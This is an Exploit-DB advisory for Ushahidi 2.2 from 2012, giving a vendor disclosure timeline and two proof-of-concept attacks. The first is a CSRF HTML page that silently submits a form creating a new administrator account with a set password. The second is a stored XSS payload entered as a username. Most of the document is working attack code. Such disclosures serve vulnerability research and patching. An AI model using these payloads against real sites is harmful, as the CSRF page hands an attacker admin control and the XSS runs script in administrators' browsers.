[] NeoSense

Ushahidi 2.2 - Multiple Vulnerabilities

Author: shpendk
type: webapps
platform: php
port: 
date_added: 2012-04-13 
date_updated: 2012-04-13 
verified: 0 
codes: OSVDB-81150;OSVDB-81149 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comUshahidi_Web_2.2_Juba_Official.zip

# Exploit Title: Ushahidi 2.2 Multiple Vulnerabilites
# Date: 04/12/2012
# Author: shpendk
# Software Link: http://download.ushahidi.com/
# Version: 2.2
# Tested on: Xampp on Windows
# Vendor Contact: 		03/25/2012
-> Contacted again:		03/28/2012
-> No Response yet:		04/11/2012
-> Full Disclosure:		04/12/2012



1) CSRF Add Admin PoC:

-----------------------------------------------------------------------------------------------------
<html>
<body>
<form action="http://127.0.0.1/admin/users/edit" method="POST">
<input type="hidden" name="name" value="myname">
<input type="hidden" name="email" value="shpendk13@gmail.com">
<input type="hidden" name="role" value="admin">
<input type="hidden" name="username" value="shpendk">
<input type="hidden" name="notify" value="1">
<input type="hidden" name="password" value="letmein">
<input type="hidden" name="password_again" value="letmein">
</form>
<script> document.forms[0].submit(); </script>

</body>
</html>

-------------------------------------------------------------------------------------------------------



2) Persistent XSS

------------------------------------------------------------------------------------------------------

	-> Go to http://127.0.0.1/login
	-> Create New User
		-> Enter username: <img/onerror="alert(123)"src=a>
	-> Login as Admin and go to http://127.0.0.1/admin/users

------------------------------------------------------------------------------------------------------